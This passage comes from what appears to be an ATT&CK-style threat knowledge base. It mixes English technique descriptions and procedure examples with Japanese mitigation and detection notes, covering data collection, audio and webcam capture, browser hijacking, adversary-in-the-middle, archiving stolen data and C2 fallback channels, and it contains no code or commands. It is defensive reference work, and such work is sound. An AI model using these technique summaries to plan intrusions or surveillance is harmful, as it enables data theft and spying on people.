data from email, OneDrive, and SharePoint. Mustang Panda used custom batch scripts to collect files automatically from a targeted system. Confucius has used a file stealer to steal documents and images with the following extensions: txt, pdf, png, jpg, doc, xls, xlm, odp, ods, odt, rtf, ppt, xlsx, xlsm, docx, pptx, and jpeg. Ember Bear engages in mass collection from compromised systems during intrusions. Agrius used a custom tool, <code>sql.net4.exe</code>, to query SQL databases and then identify and extract personally identifiable information. Winter Vivern delivered a PowerShell script capable of recursively scanning victim machines looking for various file types before exfiltrating identified files via HTTP. RedCurl has used batch scripts to collect data. VOID MANTICORE conducted large-scale data exfiltration in the Stryker operation, consistent with automated or scripted collection against enterprise systems. Rover automatically collects files from the local system and removable drives based on a predefined list of file extensions on a regular timeframe. T9000 searches removable storage devices for files with a pre-defined list of file extensions (e.g. * .doc, *.ppt, *.xls, *.docx, *.pptx, *.xlsx). Any matching files are encrypted and written to a local user directory. BADNEWS monitors USB devices and copies files with certain extensions to a predefined directory. For all non-removable drives on a victim, USBStealer executes automated collection of certain files for later exfiltration. RTM monitors browsing activity and automatically captures screenshots if a victim browses to a URL matching one of a list of strings. A Helminth VBScript receives a batch script to execute a set of commands in a command prompt. NETWIRE can automatically archive collected data. Proxysvc automatically collects data about the victim and sends it to the control server. Bankshot recursively generates a list of files within a directory and sends them back to the control server. Comnie executes a batch script to store discovery information in %TEMP%\info.dat and then uploads the temporarily file to the remote C2 server. Zebrocy scans the system and automatically collects files with the following extensions: .doc, .docx, ,.xls, .xlsx, .pdf, .pptx, .rar, .zip, .jpg, .jpeg, .bmp, .tiff, .kum, .tlg, .sbx, .cr, .hse, .hsf, and .lhz. VERMIN saves each collected file with the automatically generated format {0:dd-MM-yyyy}.txt . InvisiMole can sort and collect specific documents as well as generate a list of all files on a newly inserted drive and store them in an encrypted file. Micropsia executes an RAR tool to recursively archive files based on a predefined list of file extensions (*.xls, *.xlsx, *.csv, *.odt, *.doc, *.docx, *.ppt, *.pptx, *.pdf, *.mdb, *.accdb, *.accde, *.txt). Empire can automatically gather the username, domain name, machine name, and other information from a compromised system. PoshC2 contains a module for recursively parsing through files and directories to gather valid credit card numbers. LightNeuron can be configured to automatically collect files under a specified directory. PoetRAT used file system monitoring to track modification and enable automatic exfiltration. Attor has automatically collected data about the compromised system. MESSAGETAP checks two files, keyword_parm.txt and parm.txt, for instructions on how to target and save data parsed and extracted from SMS message data from the network traffic. If an SMS message contained either a phone number, IMSI number, or keyword that matched the predefined list, it is saved to a CSV file for later theft by the threat actor. ShimRatReporter gathered information automatically, without instruction from a C2, related to the user and host machine that is compiled into a report and sent to the operators. Metamorfo has automatically collected mouse clicks, continuous screenshots on the machine, and set timers to collect the contents of the clipboard and website browsing. Ramsay can conduct an initial scan for Microsoft Word documents on the local system, removable media, and connected network drives, before tagging and collecting them. It can continue tagging documents to collect with follow up scans. WindTail can identify and add files that possess specific file extensions to an array for archiving. TajMahal has the ability to index and compress files into a send queue for exfiltration. Valak can download a module to search for and build a report of harvested credential data. StrongPity has a file searcher component that can automatically collect and archive files based on a predefined list of file extensions. Crutch can automatically monitor removable drives in a loop and copy interesting files. GoldFinder logged and stored information related to the route or hops a packet took from a compromised machine to a hardcoded C2 server, including the target C2 URL, HTTP response/status code, HTTP response headers and values, and data received from the C2 node. AppleSeed has automatically collected data from USB drives, keystrokes, and screen images before exfiltration. ROADTools automatically gathers data from Azure AD environments using the Azure Graph API. Mythic supports scripting of file downloads from agents. OutSteel can automatically scan for and collect files with specific extensions. ccf32 can be used to automatically collect files from a compromised host. FunnyDream can monitor files for changes and automatically collect them. Depending on the Linux distribution, RotaJakiro executes a set of commands to collect device information and sends the collected information to the C2 server. Pacu can automatically collect data, such as CloudFormation templates, EC2 user data, AWS Inspector reports, and IAM credential reports. LoFiSe can collect all the files from the working directory every three hours and place them into a password-protected archive for further exfiltration. PACEMAKER can enter a loop to read `/proc/` entries every 2 seconds in order to read a target application's memory. DarkGate searches for stored credentials associated with cryptocurrency wallets and notifies the command and control server when identified. NPPSPY collection is automatically recorded to a specified file on the victim machine. Raccoon Stealer collects files and directories from victim systems based on configuration data downloaded from command and control servers. StrelaStealer attempts to identify and collect mail login data from Thunderbird and Outlook following execution. Lumma Stealer has automated collection of various information including cryptocurrency wallet details. Shai-Hulud has the ability to automatically collect host data, secrets, system information, and endpoints. LAMEHUG can recursively copy files from targeted directories on victim hosts. 敵対者は、マイク等を悪用して音声を録音し情報を収集することがある。 An adversary can leverage a computer's peripheral devices (e.g., microphones and webcams) or applications (e.g., voice and video call services) to capture audio recordings for the purpose of listening into sensitive conversations to gather information. 音声キャプチャに関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 APT37 has used an audio capturing utility known as SOUNDWAVE that captures microphone input. VOID MANTICORE has gathered audio during a Zoom session. Derusbi is capable of performing audio captures. T9000 uses the Skype API to record audio and video calls. It writes encrypted data to <code>%APPDATA%\Intel\Skype</code>. Crimson can perform audio surveillance using microphones. Flame can record audio using any existing hardware recording devices. EvilGrab has the capability to capture audio from a victim machine. Janicab captured audio and sent it out to a C2 server. Pupy can record sound with the microphone. PowerSploit's <code>Get-MicrophoneAudio</code> Exfiltration module can record system microphone audio. DOGCALL can capture microphone data from the victim's machine. Bandook has modules that are capable of capturing audio. ROKRAT has an audio capture and eavesdropping module. VERMIN can perform audio capture. InvisiMole can record sound using input audio devices. MacSpy can record the sounds from microphones on a computer. jRAT can capture microphone recordings. Remcos can capture data from the system’s microphone. DarkComet can listen in to victims' conversations through the system’s microphone. NanoCore can capture audio feeds from the system. Cobian RAT has a feature to perform voice recording on the victim’s machine. Micropsia can perform microphone recording. Revenge RAT has a plugin for microphone interception. Machete captures audio from the computer’s microphone. Imminent Monitor has a remote microphone monitoring capability. Attor's has a plugin that is capable of recording audio using available input sound devices. Cadelspy has the ability to record audio from the compromised host. TajMahal has the ability to capture VoiceIP application audio on an infected host. MacMa has the ability to record audio. NightClub can load a module to leverage the LAME encoder and `mciSendStringW` to control and capture audio. MgBot can capture input and output audio streams from infected devices. LightSpy uses Apple's built-in AVFoundation Framework library to capture and manage audio recordings then transform them to JSON blobs for exfiltration. 敵対者は、カメラ等を悪用して映像を取得し情報を収集することがある。 An adversary can leverage a computer's peripheral devices (e.g., integrated cameras or webcams) or applications (e.g., video call services) to capture video recordings for the purpose of gathering information. Images may also be captured from devices or applications, potentially in specified intervals, in lieu of video files. 映像キャプチャに関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 FIN7 created a custom video recording capability that could be used to monitor operations in the victim's environment. Silence has been observed making videos of victims to observe bank employees day to day activities. Ember Bear has exfiltrated images from compromised IP cameras. VOID MANTICORE has collected video from compromised victim devices. Derusbi is capable of capturing video. T9000 uses the Skype API to record audio and video calls. It writes encrypted data to <code>%APPDATA%\Intel\Skype</code>. Crimson can capture webcam video on targeted systems. EvilGrab has the capability to capture video from a victim machine. Pupy can access a connected webcam and capture pictures. Bandook has modules that are capable of capturing video from a victim's webcam. InvisiMole can remotely activate the victim’s webcam to capture content. QuasarRAT can perform webcam viewing. Kazuar captures images from the webcam. jRAT has the capability to capture video from a webcam. Agent Tesla can access the victim’s webcam and record video. Remcos can access a system’s webcam and take pictures. DarkComet can access the victim’s webcam to take pictures. NanoCore can access the victim's webcam and capture data. Cobian RAT has a feature to access the webcam on the victim’s machine. Empire can capture webcam data on Windows and macOS systems. Revenge RAT has the ability to access the webcam. njRAT can access the victim's webcam. Machete takes photos from the computer’s web camera. ZxShell has a command to perform video device spying. PoetRAT has used a Python tool named Bewmac to record the webcam on compromised hosts. Imminent Monitor has a remote webcam monitoring capability. SDBbot has the ability to record video on a compromised host. TajMahal has the ability to capture webcam video. ConnectWise can record video on remote hosts. ObliqueRAT can capture images from webcams on compromised hosts. Clambling can record screen content in AVI format. WarzoneRAT can access the webcam on a victim's machine. PcShare can capture camera video as part of its collection process. AsyncRAT can record screen content on targeted systems. Quick Assist allows for the remote administrator to view the interactive session of the running machine, including full screen activity. 敵対者は、ユーザーのブラウザセッションを乗っ取って情報を収集・操作することがある。 Adversaries may take advantage of security vulnerabilities and inherent functionality in browser software to change content, modify user-behaviors, and intercept information as part of various browser session hijacking techniques. ユーザーにソーシャルエンジニアリングや不審な操作への注意を教育する。 アカウントの作成・権限・ライフサイクルを適切に管理する。 ブラウザセッションの乗っ取りに関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 Kimsuky has the ability to use form-grabbing to extract emails and passwords from web data forms. Cobalt Strike can perform browser pivoting and inject into a user's browser to inherit cookies, authenticated HTTP sessions, and client SSL certificates. TrickBot uses web injects and browser redirection to trick the user into providing their login credentials on a fake or modified web page. Agent Tesla has the ability to use form-grabbing to extract data from web data forms. Dridex can perform browser attacks via web injects to steal information such as credentials, certificates, and cookies. Ursnif has injected HTML codes into banking sites to steal sensitive online banking information (ex: usernames and passwords). IcedID has used web injection attacks to redirect victims to spoofed sites designed to harvest banking and other credentials. IcedID can use a self signed TLS certificate in connection with the spoofed site and simultaneously maintains a live connection with the legitimate site to display the correct URL and certificates in the browser. Carberp has captured credentials when a user performs login through a SSL session. Melcoz can monitor the victim's browser for online banking sessions and display an overlay window to manipulate the session in the background. Grandoreiro can monitor browser activity for online banking actions and display full-screen overlay images to block user access to the intended site or present additional data fields. Chaes has used the Puppeteer module to hook and monitor the Chrome web browser to collect user information from infected hosts. QakBot can use advanced web injects to steal web banking credentials. TRANSLATEXT has the ability to use form-grabbing and event-listening to extract data from web data forms. XLoader can conduct form grabbing, steal cookies, and extract data from HTTP sessions. evilginx2 can inject custom POST arguments into requests to silently enable "Remember Me" options during authentication to stay logged in across browser sessions. 敵対者は、Confluence・SharePoint等の情報リポジトリから機密情報を収集することがある。 Adversaries may leverage information repositories to mine valuable information. Information repositories are tools that allow for storage of information, typically to facilitate collaboration or information sharing between users, and can store a wide variety of data that may aid adversaries in further objectives, such as Credential Access, Lateral Movement, or Defense Evasion, or direct access to the target information. Adversaries may also abuse external sharing features to share sensitive documents with recipients outside of the organization (i.e., Transfer Data to Cloud Account). 敵対者は、Confluenceから機密情報を収集することがある。Adversaries may leverage Confluence repositories to mine valuable information. Often found in development environments alongside Atlassian JIRA, Confluence is generally used to store development-related documentation, however, in general may contain more diverse categories of useful information, such as: 敵対者は、SharePointから機密情報を収集することがある。Adversaries may leverage the SharePoint repository as a source to mine valuable information. SharePoint will often contain useful information for an adversary to learn about the structure and functionality of the internal network and systems. For example, the following is a list of example information that may hold potential value to an adversary and may also be found on SharePoint: 敵対者は、コードリポジトリから機密情報を収集することがある。Adversaries may leverage code repositories to collect valuable information. Code repositories are tools/services that store source code and automate software builds. They may be hosted internally or privately on third party sites such as Github, GitLab, SourceForge, and BitBucket. Users typically interact with code repositories through a web application or command-line utilities such as git. 敵対者は、CRMソフトから機密情報を収集することがある。Adversaries may leverage Customer Relationship Management (CRM) software to mine valuable information. CRM software is used to assist organizations in tracking and managing customer interactions, as well as storing customer data. 敵対者は、メッセージングアプリから機密情報を収集することがある。Adversaries may leverage chat and messaging applications, such as Microsoft Teams, Google Chat, and Slack, to mine valuable information. 敵対者は、データベースから機密情報を収集することがある。Adversaries may leverage databases to mine valuable information. These databases may be hosted on-premises or in the cloud (both in platform-as-a-service and software-as-a-service environments). ユーザーにソーシャルエンジニアリングや不審な操作への注意を教育する。 アカウントの作成・権限・ライフサイクルを適切に管理する。 多要素認証を導入し、認証情報の窃取による不正アクセスを防ぐ。 機微情報を暗号化し、窃取時の影響を軽減する。 システムやアカウントを監査し、不正な活動を検出する。 ソフトウェアを安全に構成し、悪用を防ぐ。 帯域外の通信チャネルを確保し、主系の侵害時にも対応できるようにする。 情報リポジトリからのデータに関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 During the SolarWinds Compromise, APT29 accessed victims' internal knowledge repositories (wikis) to view sensitive corporate information on products, services, and internal business operations. APT28 has collected files from various information repositories. Raccoon Stealer gathers information from repositories associated with cryptocurrency wallets and the Telegram messaging service. Troll Stealer gathers information from the Government Public Key Infrastructure (GPKI) folder, associated with South Korean government public key infrastructure, on infected systems. 敵対者は、クラウドストレージサービス上のデータを収集することがある。 Adversaries may access data from cloud storage. アカウントの作成・権限・ライフサイクルを適切に管理する。 ファイルやディレクトリの権限を最小化し、不正な改変を防ぐ。 多要素認証を導入し、認証情報の窃取による不正アクセスを防ぐ。 ネットワークトラフィックをフィルタリングし、悪意ある通信を遮断する。 機微情報を暗号化し、窃取時の影響を軽減する。 システムやアカウントを監査し、不正な活動を検出する。 クラウドストレージからのデータに関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 During C0027, Scattered Spider accessed victim OneDrive environments to search for VPN and MFA enrollment information, help desk instructions, and new hire guides. During the 2025 Poland Wiper Attacks, the adversaries leveraged stolen credentials within cloud services to download targeted data from SharePoint, and Teams. Fox Kitten has obtained files from the victim's cloud storage instances. HAFNIUM has exfitrated data from OneDrive. Scattered Spider enumerates data stored in cloud resources for collection and exfiltration purposes. APT42 has collected data from Microsoft 365 environments. Storm-0501 had modified Azure Storage account resources through the `Microsoft.Storage/storageAccounts/write` operation to expose non-remotely accessible accounts for data exfiltration. AADInternals can collect files from a user’s OneDrive. Peirates can dump the contents of AWS S3 buckets. It can also retrieve service account tokens from kOps buckets in Google Cloud Storage or S3. Pacu can enumerate and download files stored in AWS storage services, such as S3 buckets. TruffleHog has the ability to scan cloud storage services for credentials to include Amazon (AWS) S3 and Google Cloud Storage. 敵対者は、通信経路に割り込み（中間者攻撃）、データを傍受・収集することがある。 Adversaries may attempt to position themselves between two or more networked devices using an adversary-in-the-middle (AiTM) technique to support follow-on behaviors such as Network Sniffing, Transmitted Data Manipulation, or replay attacks (Exploitation for Credential Access). By abusing features of common networking protocols that can determine the flow of network traffic (e.g. ARP, DNS, LLMNR, etc.), adversaries may force a device to communicate through an adversary controlled system so they can collect information or perform additional actions. 敵対者は、名前解決を汚染しSMBリレーで情報を傍受することがある。By responding to LLMNR/NBT-NS/mDNS network traffic, adversaries may spoof an authoritative source for name resolution to force communication with an adversary controlled system. This activity may be used to collect or relay authentication materials. 敵対者は、ARPキャッシュを汚染して通信を傍受することがある。Adversaries may poison Address Resolution Protocol (ARP) caches to position themselves between the communication of two or more networked devices. This activity may be used to enable follow-on behaviors such as Network Sniffing or Transmitted Data Manipulation. 敵対者は、不正なDHCP応答で通信経路を奪い傍受することがある。Adversaries may redirect network traffic to adversary-owned systems by spoofing Dynamic Host Configuration Protocol (DHCP) traffic and acting as a malicious DHCP server on the victim network. By achieving the adversary-in-the-middle (AiTM) position, adversaries may collect network communications, including passed credentials, especially those sent over insecure, unencrypted protocols. This may also enable follow-on behaviors such as Network Sniffing or Transmitted Data Manipulation. 敵対者は、偽のWi-Fi APを設置して通信を傍受することがある。Adversaries may host seemingly genuine Wi-Fi access points to deceive users into connecting to malicious networks as a way of supporting follow-on behaviors such as Network Sniffing, Transmitted Data Manipulation, or Input Capture. ユーザーにソーシャルエンジニアリングや不審な操作への注意を教育する。 ネットワークを分割し、横展開や影響範囲を限定する。 ネットワーク侵入防止システム(IPS)で悪意ある通信を遮断する。 ネットワーク越しのリソースアクセスを制限する。 ネットワークトラフィックをフィルタリングし、悪意ある通信を遮断する。 機微情報を暗号化し、窃取時の影響を軽減する。 不要な機能やプログラムを無効化・削除し、攻撃対象領域を縮小する。 中間者（AiTM）に関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 ArcaneDoor included interception of HTTP traffic to victim devices to identify and parse command and control information sent to the device. Kimsuky has used modified versions of PHProxy to examine web traffic between the victim and the accessed website. Mustang Panda leveraged a captive portal hijack that redirected the victim to a webpage that prompted the victim to download a malicious payload. Sea Turtle modified DNS records at service providers to redirect traffic from legitimate resources to Sea Turtle-controlled servers to enable adversary-in-the-middle attacks for credential capture. Dok proxies web traffic to potentially monitor and alter victim HTTP(S) traffic. NPPSPY opens a new network listener for the <code>mpnotify.exe</code> process that is typically contacted by the Winlogon process in Windows. A new, alternative RPC channel is set up with a malicious DLL recording plaintext credentials entered into Winlogon, effectively intercepting and redirecting the logon information. Line Runner intercepts HTTP requests to the victim Cisco ASA, looking for a request with a 32-character, victim dependent parameter. If that parameter matches a value in the malware, a contained payload is then written to a Lua script and executed. evilginx2 has the ability to act as an adversary-in-the-middle (AiTM) relay between a legitimate website and a phished user to capture all transmitted data including usernames, passwords, authentication tokens, and session cookies and tokens. 敵対者は、持ち出し前に収集データを圧縮・暗号化（アーカイブ）することがある。 An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender. 敵対者は、標準的な圧縮ユーティリティでデータをアーカイブすることがある。Adversaries may use utilities to compress and/or encrypt collected data prior to exfiltration. Many utilities include functionalities to compress, encrypt, or otherwise package data into a format that is easier/more secure to transport. 敵対者は、プログラムライブラリを用いてデータをアーカイブすることがある。An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party libraries. Many libraries exist that can archive data, including Python rarfile , libzip , and zlib . Most libraries include functionality to encrypt and/or compress data. 敵対者は、独自実装の方式でデータをアーカイブすることがある。An adversary may compress or encrypt data that is collected prior to exfiltration using a custom method. Adversaries may choose to use custom archival methods, such as encryption with XOR or stream ciphers implemented with no external library or utility references. Custom implementations of well-known compression algorithms have also been used. システムやアカウントを監査し、不正な活動を検出する。 収集データのアーカイブに関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 Axiom has compressed and encrypted data prior to exfiltration. The Ke3chang group has been known to compress data before exfiltration. APT28 used a publicly available tool to gather and compress multiple documents on the DCCC and DNC networks. Lazarus Group has compressed exfiltrated data with RAR and used RomeoDelta malware to archive specified directories in .zip format, encrypt the .zip file, and upload it to C2. Dragonfly has compressed data into .zip files prior to exfiltration. Following data collection, FIN6 has compressed log files into a ZIP archive prior to staging and exfiltration. Patchwork encrypted the collected files' path with AES and then encoded them with base64. menuPass has encrypted files and information before exfiltration. APT32's backdoor has used LZMA compression and RC4 encryption before exfiltration. Leviathan has archived victim's data prior to exfiltration. Ember Bear has compressed collected data prior to exfiltration. LuminousMoth has manually archived stolen files from victim machines before exfiltration. BlackByte compressed data collected from victim environments prior to exfiltration. Lurid can compress data before sending it. ADVSTORESHELL encrypts with the 3DES algorithm and a hardcoded key prior to exfiltration. Epic encrypts collected data using a public key framework before sending it over the C2 channel. Some variants encrypt the collected data with AES and encode it with base64 before transmitting it to the C2 server. Backdoor.Oldrea writes collected data to a temporary file in an encrypted form before exfiltration to a C2 server. After collecting documents from removable media, Prikormka compresses the collected files, and encrypts it with Blowfish. Daserf hides collected data in password-protected .rar archives. NETWIRE has the ability to compress archived screenshots. Gold Dragon encrypts data using Base64 before being sent to the command and control server. Zebrocy has used a method similar to RC4 as well as AES for encryption and hexadecimal for encoding data before exfiltration. RunningRAT contains code to compress files. VERMIN encrypts the collected files using 3-DES. FELIXROOT encrypts collected data with AES and Base64 and then sends it to the C2 server. Proton zips up files before exfiltrating them. Agent Tesla can encrypt data with 3DES before sending it over to a C2 server. Exaramel for Windows automatically encrypts files before sending them to the C2 server. KONNI has encrypted data and files prior to exfiltration. Empire can ZIP directories on the target system. Remexi encrypts and adds all gathered browser data into files for upload to C2. LightNeuron contains a function to encrypt and store emails that it collects. Machete stores zipped files with profile data from installed web browsers. ShimRatReporter used LZ compression to compress initial reconnaissance reports before sending to the C2. Cadelspy has the ability to compress stolen data into a .cab file. Aria-body has used ZIP to compress data gathered on a compromised host. Kessel can RC4-encrypt credentials before sending to the C2. WellMail can archive files on the compromised host. Pillowmint has encrypted stolen credit card information with AES and further encoded it with Base64. BloodHound can compress data collected by its SharpHound ingestor into a ZIP file to be written to disk. Dtrack packs collected data into a password protected archive. TAINTEDSCRIBE has used <code>FileReadZipSend</code> to compress a file and send to C2. AppleSeed has compressed collected data before exfiltration. BLUELIGHT can zip files before exfiltration. XCSSET will compress entire <code>~/Desktop</code> folders excluding all <code>.git</code> folders, but only if the total data size is under 200MB. Chrommme can encrypt and store on disk collected data before exfiltration. Lizar has encrypted data before sending it to the server. PowerLess can encrypt browser database files prior to exfiltration. Bumblebee can compress data stolen from the Registry and volume shadow copies prior to exfiltration. LoFiSe can collect files into password-protected ZIP-archives for exfiltration. Spica can archive collected documents for exfiltration. Raccoon Stealer archives collected system information in a text f ile, `System info.txt`, prior to exfiltration. Troll Stealer compresses stolen data prior to exfiltration. JumbledPath can compress and encrypt exfiltrated packet captures from targeted devices. MuddyViper has archived collected web browser data into a file named CacheDump.zip. LP-Notes has encrypted collected credentials using AES-CBC from the CNG API and the key ED15C8344B45DAED1E0578F8BC1A32411812C61F4CB45D89B107287DE0E09FFC and the initialization vector 91A4E6F6D51DAEE773A8F00279792578. 敵対者は、ネットワーク機器の構成リポジトリ（SNMP等）からデータを収集することがある。 Adversaries may collect data related to managed devices from configuration repositories. Configuration repositories are used by management systems in order to configure, manage, and control data on remote systems. Configuration repositories may also facilitate remote access and administration of devices. 敵対者は、SNMPのMIBをダンプしてネットワーク機器の構成情報を収集することがある。Adversaries may target the Management Information Base (MIB) to collect and/or mine valuable information in a network managed using Simple Network Management Protocol (SNMP). 敵対者は、ネットワーク機器の構成をダンプして収集することがある。Adversaries may access network configuration files to collect sensitive data about the device and the network. The network configuration is a file containing parameters that determine the operation of the device. The device typically stores an in-memory copy of the configuration while operating, and a separate configuration on non-volatile storage to load after device reset. Adversaries can inspect the configuration files to reveal information about the target network and its layout, the network device and its software, or identifying legitimate accounts and credentials for later use. ネットワークを分割し、横展開や影響範囲を限定する。 ネットワーク侵入防止システム(IPS)で悪意ある通信を遮断する。 ネットワークトラフィックをフィルタリングし、悪意ある通信を遮断する。 機微情報を暗号化し、窃取時の影響を軽減する。 ソフトウェアを最新に保ち、既知の脆弱性を修正する。 ソフトウェアを安全に構成し、悪用を防ぐ。 構成リポジトリからのデータに関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 敵対者は、C2通信を難読化して検知を困難にすることがある。 Adversaries may obfuscate command and control traffic to make it more difficult to detect. Command and control (C2) communications are hidden (but not necessarily encrypted) in an attempt to make the content more difficult to discover or decipher and to make the communication less conspicuous and hide commands from being seen. This encompasses many methods, such as adding junk data to protocol traffic, using steganography, or impersonating legitimate protocols. 敵対者は、無意味なデータを混ぜてC2通信を難読化することがある。Adversaries may add junk data to protocols used for command and control to make detection more difficult. By adding random or meaningless data to the protocols used for command and control, adversaries can prevent trivial methods for decoding, deciphering, or otherwise analyzing the traffic. Examples may include appending/prepending data with junk characters or writing junk characters between significant characters. 敵対者は、画像等にデータを隠してC2通信を行うことがある。Adversaries may use steganographic techniques to hide command and control traffic to make detection efforts more difficult. Steganographic techniques can be used to hide data in digital messages that are transferred between systems. This hidden information can be used for command and control of compromised systems. In some cases, the passing of files embedded using steganography, such as image or document files, can be used for command and control. 敵対者は、正規プロトコル/サービスを装ってC2通信を難読化することがある。Adversaries may impersonate legitimate protocols or web service traffic to disguise command and control activity and thwart analysis efforts. By impersonating legitimate protocols or web services, adversaries can make their command and control traffic blend in with legitimate network traffic. ネットワーク侵入防止システム(IPS)で悪意ある通信を遮断する。 データ難読化に関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 During Operation Wocao, threat actors encrypted IP addresses used for "Agent" proxy hops with RC4. Gamaredon Group has used obfuscated VBScripts with randomly generated variable names and concatenated strings. FlawedAmmyy may obfuscate portions of the initial C2 handshake. Okrum leverages the HTTP protocol for C2 communication, while hiding the actual messages in the Cookie and Set-Cookie headers of the HTTP requests. RDAT has used encoded data within subdomains as AES ciphertext to communicate from the host to the C2. SLOTHFULMEDIA has hashed a string containing system information prior to exfiltration via POST requests. SideTwist can embed C2 responses in the source code of a fake Flickr webpage. TrailBlazer can masquerade its C2 traffic as legitimate Google Notifications HTTP requests. FunnyDream can send compressed and obfuscated packets to C2. Ninja has the ability to modify headers and URL paths to hide malicious traffic in HTTP requests. DarkGate will retrieved encrypted commands from its command and control server for follow-on actions such as cryptocurrency mining. FRAMESTING can send and receive zlib compressed data within `POST` requests. StrelaStealer encrypts the payload of HTTP POST communications using the same XOR key used for the malware's DLL payload. SystemBC has encoded with XOR and encrypted with RC4 its beacon. evilginx2 can modify the Origin and Referrer fields in HTTPS headers it relays between intended victims and legitimate websites to comply with cross-origin resource sharing (CORS) restrictions. 敵対者は、主C2が遮断された場合に備えて代替（フォールバック）通信チャネルを用意することがある。 Adversaries may use fallback or alternate communication channels if the primary channel is compromised or inaccessible in order to maintain reliable command and control and to avoid data transfer thresholds. ネットワーク侵入防止システム(IPS)で悪意ある通信を遮断する。 フォールバックチャネルに関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 During Night Dragon, threat actors used company extranet servers as secondary C2 servers. Lazarus Group malware SierraAlfa sends data to one of the hard-coded C2 servers chosen at random, and if the transmission fails, chooses a new C2 server to attempt the transmission again. FIN7's Harpy backdoor malware can use DNS as a backup channel for C2 if HTTP fails. OilRig malware ISMAgent falls back to its DNS tunneling mechanism if it is unable to reach the C2 server over HTTP. APT41 used the Steam community page as a fallback mechanism for C2. UNC3886 has employed layers of redundancy to maintain access to compromised environments including network devices, hypervisors, and virtual machines. BISCUIT malware contains a secondary fallback command and control server that is contacted after the primary command and control server. Derusbi uses a backup communication method with an HTTP beacon. Uroburos can use up to 10 channels to communicate between implants. CHOPSTICK can switch to a new C2 channel if the current one is broken. NETEAGLE will attempt to detect if the infected host is configured to a proxy. If so, NETEAGLE will send beacons via an HTTP POST request; otherwise it will send beacons via UDP/6000. JHUHUGIT tests if it can reach its C2 server by first attempting a direct connection, and if it fails, obtaining proxy settings and sending the connection through a proxy, and finally injecting code into a running browser if the proxy method fails. MiniDuke uses Google Search to identify C2 servers if its primary C2 method via Twitter is not working. SslMM has a hard-coded primary and backup C2 string. WinMM is usually configured with primary and backup domains for C2 communications. DustySky has two hard-coded domains for C2 servers; if the first does not respond, it will try the second. Mis-Type first attempts to use a Base64-encoded network protocol over a raw TCP socket for C2, and if that method fails, falls back to a secondary HTTP-based protocol to communicate to an alternate C2 server. S-Type primarily uses port 80 for C2, but falls back to ports 443 or 8080 if initial communication fails. BlackEnergy has the capability to communicate over a backup channel via plus.google.com. The C2 server used by XTunnel provides a port number to the victim to use as a fallback in case the connection closes on the currently used port. Linfo creates a backdoor through which remote attackers can change C2 servers. Kwampirs uses a large list of C2 servers that it cycles through until a successful connection is established. InvisiMole has been configured with several servers available for alternate C2 communications. Kazuar can accept multiple URLs for C2 servers. TrickBot can use secondary C2 servers for communication after establishing connectivity and relaying victim information to primary C2 servers. QUADAGENT uses multiple protocols (HTTPS, HTTP, DNS) for its C2 server as fallback channels if communication with one is unsuccessful. Cardinal RAT can communicate over multiple C2 host and port combinations. HOPLIGHT has multiple C2 channels in place in case one fails. Ebury has implemented a fallback mechanism to begin using a DGA when the attacker hasn't connected to the infected system for three days. Exaramel for Linux can attempt to find a new C2 server if it receives an error. Machete has sent data over HTTP if FTP failed, and has also used a fallback server. ShimRat has used a secondary C2 location if the first was unavailable. Valak can communicate over multiple C2 hosts. RDAT has used HTTP if DNS C2 communications were not functioning. PipeMon can switch to an alternate C2 domain when a particular date has been reached. Anchor can use secondary C2 servers for communication after establishing connectivity and relaying victim information to primary C2 servers. FatDuke has used several C2 servers per targeted organization. Bazar has the ability to use an alternative C2 server if the primary server fails. Crutch has used a hardcoded GitHub repository as a fallback channel. TAINTEDSCRIBE can randomly pick one of five hard-coded IP addresses for C2 communication; if one of the IP fails, it will wait 60 seconds and then try another IP address. Stuxnet has the ability to generate new C2 domains. SideTwist has primarily used port 443 for C2 but can use port 80 as a fallback. AppleSeed can use a second channel for C2 when the primary channel is in upload mode. RainyDay has the ability to switch between TCP and HTTP for C2 if one method is not working. Gelsemium can use multiple domains and protocols in C2. TinyTurla can go through a list of C2 server IPs and will try to register with each until one responds. CharmPower can change its C2 channel once every 360 loops by retrieving a new domain from the actors’ S3 bucket. Mythic can use a list of C2 URLs as fallback mechanisms in case one IP or domain gets blocked. Shark can update its configuration to use a different C2 server. Kevin can assign hard-coded fallback domains for C2. Bumblebee can use backup C2 servers if the primary server fails. QUIETEXIT can attempt to connect to a second hard-coded C2 if the first hard-coded C2 address fails. OilBooster can use a backup channel to request a new refresh token from its C2 server after 10 consecutive unsuccessful connections to the primary OneDrive C2 server. GlassWorm has utilized Google Calendar as backup C2. HiddenFace can use active and passive C2 modes that use different encryption algorithms and backdoor commands. 敵対者は、HTTP/DNS等のアプリ層プロトコルを用いてC2通信を行い、正常トラフィックに紛れさせることがある。 Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. 敵対者は、HTTP/HTTPSを用いてC2通信を行うことがある。Adversaries may communicate using application layer protocols associated with web traffic to avoid detection/network filtering by blending in with existing 